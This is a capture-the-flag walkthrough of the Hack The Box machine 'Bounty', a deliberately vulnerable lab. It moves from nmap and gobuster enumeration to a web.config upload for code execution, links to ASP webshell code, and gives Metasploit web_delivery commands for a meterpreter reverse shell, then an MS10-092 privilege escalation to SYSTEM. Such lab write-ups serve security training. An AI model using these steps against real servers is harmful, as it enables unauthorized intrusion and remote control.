twitter

Hack The Box: Bounty

Difficulty: Eazy
Machine Creator: mrb3n
Tools Used:

NMAP
Gobuster
Metasploit

Task: To find User.txt and Root.txt
Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A 10.10.10.93


From the NMAP scan, we can see port 80 HTTP server running Microsoft IIS 7.5.


Browsing the website on this server, we see a single image of a wizard.

GoBuster

Using Gobuster, we can perform a directory scan. This host is a windows IIS server so we can add the extensions of .aspx,.html.

gobuster -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html


The Gobuster results show an aspx file and a directory named uploadedfiles.


The transfer.aspx page appears to gives us the ability to upload a file.


When I try to upload a file, I’m just getting an error.

Remote Code Execution (RCE)


After a little research, we may be able to upload a web.config file and perform some remote code execution. This example will test adding 1+2.


I was able to upload the new web.config file successfully.


Success the remote code execution is returning the results of 3.

Webshell

Since we can upload a web.config file, we should be able to upload a web shell in the config file.

https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asphttps://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp


I’ve replaced the configuration section of the web.config file with the web shell code.


The web shell config file uploaded successfully, and now we have a surface to exploit.

Web Delivery Meterperter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) run

The output of the exploit gives us a PowerShell command that we can use on the RCE page.

Meterperter Shell


Success after running the PowerShell script from the web shell page we now have a meterperter shell running as user bounty\merlin.

User.txt


Our shell as Merlin we can read the user.txt on merlin’s desktop.

Privilege Escalation

Now we need to get system level session to get the root.txt we can use the recon local_exploit_suggester module in Metasploit.

msf use post/multi/recon/local_exploit_suggester
msf set session 2
msf run


After running the exploit suggester, it appears that this machine may be vulnerable to MS10_092.

Privilege Escalation Exploit


After running exploit ms10_092_schelevator, we now have a new meterperter session.


System-level meterperter shell.

Root.txt


As system, we can now read the contents of root.txt.